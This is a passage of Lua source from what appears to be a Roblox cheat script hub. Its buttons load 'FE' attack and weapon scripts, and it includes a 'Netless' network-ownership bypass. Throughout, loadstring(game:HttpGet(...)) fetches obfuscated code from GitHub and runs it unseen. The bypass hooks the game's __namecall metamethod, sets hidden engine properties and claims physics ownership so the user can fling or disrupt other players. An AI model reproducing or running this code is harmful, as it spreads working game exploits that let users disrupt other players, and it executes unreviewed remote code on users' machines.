Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Click: Punch Kick Combo - F: Equip knives - Click (Knives Equipped): Knife Slash Combo - R: Lay Down & Kick Feet - T: Taunt]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Goner", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() DisableFlingHealthBar = false loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Goner"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Click: Slash - Q: Ink Underground]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Linked Sword", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() DisableFlingHealthBar = false loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Linked%20Sword"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Click: Sword Slash Combo - Z: Baller Ball - X: Rocket Launcher - C: Bomb]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Star Glitcher", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() -- SET THE VARIABLE BELOW TO TRUE TO DISABLE ALL EFFECTS, COULD HELP WITH PERFORMANCE ISSUES if IsOnMobile then DisableFX = true else DisableFX = false end loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Star%20Glitcher"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Click: Impale Combo - Modes: The script has a ton of modes, I recommend watching the video on our channel for the full move list]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Gale Fighter", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Gale%20Fighter"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Click: Punch/Kick Combo - R: Kick Combo - F: Hyper Kick Combo - T: Taunt]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Motorcycle", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Motorcycle"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Click: Shoot - Z: Boost]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Ban Hammer", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Ban%20Hammer"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Click: Ban - E: Ban 2 - R: Ban 3]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE AK47", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/AK-47"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: - Click: Shoot]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Neptunian V", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Neptunian%20V"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - F: Equip - R: Jump *MUST BE EQUIPPED* - Click: Slash - Z: Charge dash - X: Big Diamond Sword Projectile - C: Spin sword strike]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Karambit", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Karambit"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Krystal Dance", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Krystal%20Dance"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Q: The Swoosher - E: The nutty - R: Spin me right round! - T: Plum juice dance - Y: Moonwalk - U: Slav dance - P: Barrel roll - F: The Jerky - G: The Shuffle - H: The Spongebob - J: Here comes the money! - K: Runnin' in the 90's]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Sniper", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Sniper"))() Fluent:Notify({ Title = "Controls", Content = ([[Script Moves: (USE A KEYBOARD SCRIPT IF MOVE REQUIRES A KEYBOARD KEY) - Z: Shoot - X: Jump Forward Shoot - C: Jump Backwards Shoot - V: Spam Shoot - B: Mortar Shoot - J: Dash]]), SubContent = "", -- Optional Duration = 15 -- Set to nil to make the notification not disappear }) if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Banisher", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Banisher"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Lightning Cannon", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Lightning%20Cannon"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Pistol", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Pistol"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) GENESIS:AddButton({ Title = "FE Studio Dummy", Description = "need hats btw join Genesis game if you do not have hats for this script.", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Studio%20Dummy"))() if IsOnMobile or VREnabled and not game:GetService("CoreGui"):FindFirstChild("Keyboard gui WarriorRoberr Version") then Fluent:Notify({ Title = "Loaded Keyboard Script", Content = "Reason: Because Your device, so more support.", SubContent = "", Duration = 15 }) loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))() end end }) local nets = Window:AddTab({ Title = "Networkownership bypasses", Icon = "globe" }) nets:AddButton({ Title = "Netless", Description = "Bypass", Callback = function() -- hi local speedtesttick = tick() -- // Modules/Setup -- incase someone doesn't have getgenv in their exploit for some odd reason local getgenv = getgenv and getgenv() or _G -- Default Values if getgenv.Optimizer == nil then getgenv.Optimizer = false end if getgenv.Optimizer then end if getgenv.Fling == true then getgenv.Fling = "HumanoidRootPart" end if getgenv.Fling == nil then getgenv.Fling = "" end if getgenv.ShowReal == nil then getgenv.ShowReal = false end if getgenv.FakeGod == nil then getgenv.FakeGod = false end if getgenv.GodMode == nil then getgenv.GodMode = true end if getgenv.AutoAnimate == nil then getgenv.AutoAnimate = true end if getgenv.Tools == nil then getgenv.Tools = true end if getgenv.Velocity == nil then getgenv.Velocity = -25.05 end if getgenv.Collisions == nil then getgenv.Collisions = true end if getgenv.CheckForDeath == nil then getgenv.CheckForDeath = true end if getgenv.Network == nil then getgenv.Network = false end if getgenv.Netless2 == nil then getgenv.Netless2 = false end if getgenv.Claim2 == nil then getgenv.Claim2 = false end if getgenv.Notification == nil then getgenv.Notification = true end if getgenv.DynamicVelocity == nil then getgenv.DynamicVelocity = false end if getgenv.DynamicVelocityExperimental == nil then getgenv.DynamicVelocityExperimental = false end if getgenv.AntiSleep == nil then getgenv.AntiSleep = true end if getgenv.MovementVelocity == nil then getgenv.MovementVelocity = false end if getgenv.R6toR15 == nil then getgenv.R6toR15 = false end -- // Notification Module local notification = loadstring(game:HttpGet("https://gist.githubusercontent.com/CenteredSniper/5aacd41c762304c92802ed4ad714cc98/raw/e8c9b25cb3660028793342728553efdb24e72bec/NotificationService.lua",true))() local function notify(title,duration) if getgenv.Notification then notification({ Text = title, Duration = duration }) end end -- Checking if reanimated or not if game:GetService("Workspace"):FindFirstChild("non") then notify("Already Reanimated?") error("Already Reanimated?") end -- Preloading PhysicsService enabler --Added a second hook cuz in some reason hookmetamethod doesnt work in Synapse X local PhysicsService = game:GetService("PhysicsService") local Workspace = game:GetService("Workspace") local function doMath(index) return -(2^(index-1)) end local function FindCollisionGroup(CollisionGroup) for i,v in pairs(gethiddenproperty(Workspace, "CollisionGroups"):split("\\")) do local split = v:split("^") if split[1] == CollisionGroup then return v end end return false end local function EditCollisionGroup(Name,arg1,arg2,arg3) local str = "" local args = {arg1,arg2,arg3} for i,v in pairs(gethiddenproperty(Workspace, "CollisionGroups"):split("\\")) do local split = v:split("^") if split[1] == Name then for i,v in pairs(args) do if not v then args[i] = split[i] end end str = str..string.format("%s%s^%s^%s",((i == 1 and "" ) or "\\") ,args[1], args[2], args[3]) else str = str..string.format("%s%s^%s^%s",((i == 1 and "" ) or "\\") ,split[1], split[2], split[3]) end end sethiddenproperty(Workspace, "CollisionGroups", str) end local function CreateCollisionGroup(Name) assert(FindCollisionGroup(Name) == false, "Could not create collision group, one with that name already exists.") sethiddenproperty(Workspace, "CollisionGroups", string.format("%s\\%s^%s^%s", gethiddenproperty(Workspace, "CollisionGroups"),Name,tonumber(#PhysicsService:GetCollisionGroups()), "-1" )) return true end local function CollisionGroupSetCollidable(Name1,Name2,Boolean) assert(typeof(Name1) == "string", string.format("Bad argument #1 to '?' (string expected, got %s)", typeof(Name1))) assert(typeof(Name2) == "string", string.format("Bad argument #2 to '?' (string expected, got %s)", typeof(Name1))) assert(typeof(Boolean) == "boolean", string.format("Bad argument #3 to '?' (boolean expected, got %s)", typeof(Name1))) assert(FindCollisionGroup(Name1) ~= false, "Both collision groups must be valid.") assert(FindCollisionGroup(Name2) ~= false, "Both collision groups must be valid.") local CollisionGroup1 = FindCollisionGroup(Name1) local CollisionGroup2 = FindCollisionGroup(Name2) local split1 = CollisionGroup1:split("^") local split2 = CollisionGroup2:split("^") if Boolean == false then if PhysicsService:CollisionGroupsAreCollidable(Name1, Name2) == true then if Name1 == Name2 then EditCollisionGroup(split1[1], false, false , (tonumber(split1[3])) + doMath(tonumber(split1[2]+1))) elseif Name1 ~= Name2 then EditCollisionGroup(split1[1], false, false , (tonumber(split1[3])) + doMath(tonumber(split2[2]+1))) EditCollisionGroup(split2[1], false, false , (tonumber(split2[3])) + doMath(tonumber(split1[2]+1))) end end elseif Boolean == true then if PhysicsService:CollisionGroupsAreCollidable(Name1, Name2) == false then if Name1 == Name2 then EditCollisionGroup(split1[1], false, false , (tonumber(split1[3])) - doMath(tonumber(split1[2]+1))) elseif Name1 ~= Name2 then EditCollisionGroup(split1[1], false, false , (tonumber(split1[3])) - doMath(tonumber(split2[2]+1))) EditCollisionGroup(split2[1], false, false , (tonumber(split2[3])) - doMath(tonumber(split1[2]+1))) end end end end local function RemoveCollisionGroup(CollisionGroup) string.gsub(gethiddenproperty(Workspace, "CollisionGroups"),"([%w%p]*)("..CollisionGroup.."%^%d+%^%-%d+)([%w%p]*)",function(arg1,arg2,arg3) local new = "" for index, value in pairs(string.split(arg3,"\\")) do new = new.."\\"..string.gsub(value,"(%w+%^)(%d+)(%^%-%d+)",function(arg1,arg2,arg3) return arg1..math.floor(tonumber(arg2)-1)..arg3 end) end if new:sub(1,1) == "\\" then new = new:sub(2,new:len()) end local toReturn = arg1..new if toReturn:sub(toReturn:len(),toReturn:len()) == "\\" then toReturn = toReturn:sub(1,toReturn:len()-1) end sethiddenproperty(Workspace, "CollisionGroups", toReturn) end) end local function RenameCollisionGroup(CollisionGroup,newName) assert(typeof(CollisionGroup) == "string", string.format("Bad argument #1 to '?' (string expected, got %s)", typeof(CollisionGroup))) assert(typeof(newName) == "string", string.format("Bad argument #1 to '?' (string expected, got %s)", typeof(newName))) assert(FindCollisionGroup(CollisionGroup) ~= false, "Cannot find the collision group") assert(FindCollisionGroup(newName) == false, "This collision group already exists!") string.gsub(gethiddenproperty(Workspace, "CollisionGroups"),"([%w%p]*)("..CollisionGroup.."%^%d+%^%-%d+)([%w%p]*)",function(arg1,arg2,arg3) local split = FindCollisionGroup(CollisionGroup):split("^") local str = newName.."^"..split[2].."^"..split[3] sethiddenproperty(Workspace, "CollisionGroups", arg1..str..arg3) end) end xpcall(function() local old old = hookmetamethod(game, "__namecall" ,newcclosure(function(self,...) if not checkcaller() then return old(self,...) end local args = {...} if self == PhysicsService then if getnamecallmethod() == "RenameCollisionGroup" then return RenameCollisionGroup(args[1],args[2]) elseif getnamecallmethod() == "RemoveCollisionGroup" then return RemoveCollisionGroup(args[1]) elseif getnamecallmethod() == "CreateCollisionGroup" then return CreateCollisionGroup(args[1]) elseif getnamecallmethod() == "CollisionGroupSetCollidable" then return CollisionGroupSetCollidable(args[1],args[2],args[3]) end end return old(self,...) end)) end, function() local mt = getrawmetatable(game) local old = mt.__namecall setreadonly(mt,false) mt.__namecall = newcclosure(function(self, ...) if not checkcaller() then return old(self,...) end local args = {...} if self == PhysicsService then if getnamecallmethod() == "RenameCollisionGroup" then return RenameCollisionGroup(args[1],args[2]) elseif getnamecallmethod() == "RemoveCollisionGroup" then return RemoveCollisionGroup(args[1]) elseif getnamecallmethod() == "CreateCollisionGroup" then return CreateCollisionGroup(args[1]) elseif getnamecallmethod() == "CollisionGroupSetCollidable" then return CollisionGroupSetCollidable(args[1],args[2],args[3]) end end return old(self,...) end) setreadonly(mt,true) end) -- Preformance Values settings().Rendering.EagerBulkExecution = true settings().Physics.PhysicsEnvironmentalThrottle = Enum.EnviromentalPhysicsThrottle.Disabled settings().Physics.AllowSleep = false settings().Physics.ForceCSGv2 = false settings().Physics.DisableCSGv2 = true settings().Physics.UseCSGv2 = false settings().Physics.ThrottleAdjustTime = math.huge -- // Variables local PhysicsService = game:GetService("PhysicsService") local RunService = game:GetService("RunService") local Players = game:GetService("Players") local Player = Players.LocalPlayer local FakeTorso,FakeTorso1,FakeHead local cr,cc = task.spawn,coroutine.create local RigType = Player.Character.Humanoid.RigType if getgenv.TorsoFling then if RigType == Enum.HumanoidRigType.R15 then getgenv.Fling = "LowerTorso" else getgenv.Fling = "Torso" end end -- Incase the exploit doesn't have sethiddenproperty local SetHiddenProperty = sethiddenproperty or sethiddenprop or function() end local OriginalRig = Player.Character local Character,R15Offsets,Claim2Heartbeat -- Storing the Velocity Variable for netless, needed because dynamic velocity and movement velocity local Velocity = Vector3.new(getgenv.Velocity, getgenv.Velocity, getgenv.Velocity) -- Setting Sim Radius, useful for claiming parts if getgenv.Network then game:GetService("Players").LocalPlayer.MaximumSimulationRadius=1000 SetHiddenProperty(game:GetService("Players").LocalPlayer,"SimulationRadius",1000) end -- Artifical HB local event = getgenv.MiliWait if not event then local fw = loadstring(game:HttpGet("https://gist.githubusercontent.com/CenteredSniper/fe5cbdbc396630374041f0c2d156a747/raw/5491a28fd72ed7e11c9fa3f9141df033df3ed5a9/fastwait.lua"))() event = Instance.new("BindableEvent") cr(cc(function() while true do cr(cc(function() for i=1,math.max(game:GetService("Stats").Workspace.FPS:GetValue()/27.5,1) do event:Fire() end end)) --task.wait(0/1) fw(0/1) end end)) event.Name = "ExPro" getgenv.MiliWait = event end -- Fast wait by Expro local wait = function(int) if not int then int = 0 end local t = tick() repeat --task.wait(0/1) event.Event:Wait() until (tick() - t) >= int return (tick() - t), t end -- Not all exploits have isnetworkowner local function networkownership(obj) if isnetworkowner and obj and obj:IsA("BasePart") then return isnetworkowner(obj) else return true end end -- // Collisions local check; pcall(function() check = PhysicsService:GetCollisionGroupId("NoCollide") end) if not check then PhysicsService:CreateCollisionGroup("NoCollide") end PhysicsService:CollisionGroupSetCollidable("NoCollide", "NoCollide", false) if getgenv.FakeGod and RigType == Enum.HumanoidRigType.R6 then getgenv.GodMode = false end if getgenv.MovementVelocity then getgenv.DynamicVelocity = false getgenv.DynamicVelocityExperimental = false end if getgenv.DynamicVelocityExperimental then getgenv.DynamicVelocity = false end -- // RigType if RigType == Enum.HumanoidRigType.R15 then -- R15Offsets for the r15 to r6, now scale-accessible! R15Offsets = { ["Left Arm"] = {["LeftUpperArm"] = CFrame.new((1-OriginalRig.LeftUpperArm.Size.X)*2,0.369*(OriginalRig.LeftUpperArm.Size.Y/1.169),0), ["LeftLowerArm"] = CFrame.new((1-OriginalRig.LeftLowerArm.Size.X)*2,-0.224*(OriginalRig.LeftLowerArm.Size.Y/1.052),0), ["LeftHand"] = CFrame.new((1-OriginalRig.LeftHand.Size.X)*2,-0.85*(OriginalRig.LeftHand.Size.Y/0.3),0), }, ["Right Arm"] = {["RightUpperArm"] = CFrame.new(-(1-OriginalRig.RightUpperArm.Size.X)*2,0.369*(OriginalRig.RightUpperArm.Size.Y/1.169),0), ["RightLowerArm"] = CFrame.new(-(1-OriginalRig.RightLowerArm.Size.X)*2,-0.224*(OriginalRig.RightLowerArm.Size.Y/1.052),0), ["RightHand"] = CFrame.new(-(1-OriginalRig.RightHand.Size.X)*2,-0.85*(OriginalRig.RightHand.Size.Y/0.3),0), }, ["Torso"] = {["UpperTorso"] = CFrame.new(0,0.2*(OriginalRig.UpperTorso.Size.Y/1.6),0), ["LowerTorso"] = CFrame.new(0,-0.8*(OriginalRig.LowerTorso.Size.Y/0.4),0), }, ["Left Leg"] = {["LeftUpperLeg"] = CFrame.new((1-OriginalRig.LeftUpperLeg.Size.X)/2,0.579*(OriginalRig.LeftUpperLeg.Size.Y/1.217),0), ["LeftLowerLeg"] = CFrame.new((1-OriginalRig.LeftLowerLeg.Size.X)/2,-0.201*(OriginalRig.LeftLowerLeg.Size.Y/1.193),0), ["LeftFoot"] = CFrame.new((1-OriginalRig.LeftFoot.Size.X)/2,-0.85*(OriginalRig.LeftFoot.Size.Y/0.3),0), }, ["Right Leg"] = {["RightUpperLeg"] = CFrame.new(-(1-OriginalRig.RightUpperLeg.Size.X)/2,0.579*(OriginalRig.RightUpperLeg.Size.Y/1.217),0), ["RightLowerLeg"] = CFrame.new(-(1-OriginalRig.RightLowerLeg.Size.X)/2,-0.201*(OriginalRig.RightLowerLeg.Size.Y/1.193),0), ["RightFoot"] = CFrame.new(-(1-OriginalRig.RightFoot.Size.X)/2,-0.85*(OriginalRig.RightFoot.Size.Y/0.3),0), }, ["Head"] = {["Head"] = CFrame.new(0,0,0) }, } Character = game:GetObjects("rbxassetid://8232772380")[1]:Clone() Character.Parent = workspace Character.Humanoid:ApplyDescription(Players:GetHumanoidDescriptionFromUserId(Player.UserId)) for i,v in pairs(Character:GetChildren()) do if v:IsA("Accessory") then v:Destroy() end end for i,v in pairs(OriginalRig:GetChildren()) do if v:IsA("Accessory") then local clonehats = v:Clone() clonehats.Parent = Character for _,g in pairs(R15Offsets) do if g[v.Handle.AccessoryWeld.Part1.Name] then clonehats.Handle.AccessoryWeld.Part1 = Character[_] end end end end Character:PivotTo(OriginalRig.HumanoidRootPart.CFrame) for i,v in pairs(OriginalRig:GetChildren()) do if v:IsA("Tool") then v:Clone().Parent = Character end end elseif getgenv.R6toR15 then Character = game:GetObjects("rbxassetid://9028578914")[1]:Clone() Character.Parent = workspace Character.Humanoid:ApplyDescription(Players:GetHumanoidDescriptionFromUserId(Player.UserId)) R15Offsets = { {"Left Arm","LeftLowerArm",CFrame.new((1-Character.LeftLowerArm.Size.X)*2,0.224*(Character.LeftLowerArm.Size.Y/1.052),0)}, {"Right Arm","RightLowerArm",CFrame.new(-(1-Character.RightLowerArm.Size.X)*2,0.224*(Character.RightLowerArm.Size.Y/1.052),0)}, {"Torso","UpperTorso",CFrame.new(0,-0.2*(Character.UpperTorso.Size.Y/1.6),0)}, {"Left Leg","LeftLowerLeg",CFrame.new((1-Character.LeftLowerLeg.Size.X)/2,0.201*(Character.LeftLowerLeg.Size.Y/1.193),0)}, {"Right Leg","RightLowerLeg",CFrame.new(-(1-Character.RightLowerLeg.Size.X)/2,0.201*(Character.RightLowerLeg.Size.Y/1.193),0)}, {"Head","Head",CFrame.new(0,0,0)}, {"HumanoidRootPart","HumanoidRootPart",CFrame.new(0,0,0)}, } for i,v in pairs(OriginalRig:GetChildren()) do if v:IsA("Tool") then v:Clone().Parent = Character end end Character.Humanoid.DisplayDistanceType = Enum.HumanoidDisplayDistanceType.None else Player.Character.Archivable = true Character = Player.Character:Clone() Player.Character.Archivable = false Character.Parent = workspace end wait() Character.Name = "non" getgenv.RealRig = OriginalRig getgenv.CloneRig = Character -- // Hat Matching Value local function findmatchingaccessory(hat) for i,v in pairs(Character:GetChildren()) do if v:IsA("Accessory") then local meshid1 = v.Handle:FindFirstChildOfClass("SpecialMesh") or v.Handle local meshid2 = hat:FindFirstChildOfClass("SpecialMesh") or hat local texture1 = v.Handle:FindFirstChildOfClass("SpecialMesh") and v.Handle:FindFirstChildOfClass("SpecialMesh").TextureId or v.Handle.TextureID local texture2 = hat:FindFirstChildOfClass("SpecialMesh") and hat:FindFirstChildOfClass("SpecialMesh").TextureId or hat.TextureID if meshid1.MeshId == meshid2.MeshId and texture1 == texture2 then local CloneHat = Instance.new("ObjectValue",hat) CloneHat.Value = v.Handle CloneHat.Name = "CloneHat" end end end end -- // Claim 2 OriginalRig.Humanoid:ChangeState(16) --Player.Character.Humanoid.PlatformStand = true if getgenv.Claim2 then Character.HumanoidRootPart.Anchored = true --OriginalPosition = Player.Character.HumanoidRootPart.CFrame local actualpos repeat wait() pcall(function() local pos = Player.Character.HumanoidRootPart.Position + Vector3.new(math.random(-1500,1500),100,math.random(-1500,1500)) local check = true for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v~= Player and v.Character and v.Character:FindFirstChild("HumanoidRootPart") then if (v.Character.HumanoidRootPart.Position-pos).magnitude <= 1000 then check = false end end end if check then actualpos = pos end end) until actualpos Player.Character.HumanoidRootPart.CFrame = CFrame.new(actualpos) notify("Claim2; Found Pos",6) end -- // Netless claiming for i,v in pairs(OriginalRig:GetDescendants()) do cr(cc(function() if v:IsA("BasePart") then --v.Velocity = Velocity --v:ApplyImpulse(Velocity) local netlessbeat local a = Instance.new("BodyVelocity",v) a.MaxForce = Vector3.new(math.huge,math.huge,math.huge); a.P = math.huge; a.Velocity = getgenv.Netless2 and Vector3.new(0,0,0) or Vector3.new(getgenv.Velocity,getgenv.Velocity,getgenv.Velocity) local a = Instance.new("BodyAngularVelocity",v) a.MaxTorque = Vector3.new(math.huge,math.huge,math.huge); a.P = math.huge; a.AngularVelocity = Vector3.new(0,0,0) v.Massless = true v.CustomPhysicalProperties = PhysicalProperties.new(0,0,0,0,0) local selectionbox = Instance.new("SelectionBox",v) selectionbox.Transparency = 1; selectionbox.Adornee = v; netlessbeat = event.Event:Connect(function() if v and v.Parent then if not getgenv.DynamicVelocityExperimental then v:ApplyImpulse(Velocity) end if v.Name == "Head" and not getgenv.GodMode then v.SelectionBox.Transparency = 1 else if not networkownership(v) then v.SelectionBox.Transparency = 0 else v.SelectionBox.Transparency = 1 end end else netlessbeat:Disconnect() end end) if v.Parent:IsA("Accessory") then findmatchingaccessory(v) end end end)) end notify("Netless Claimed",6) -- keeping the tools so they dont lose ownership local tools = {} for i,v in 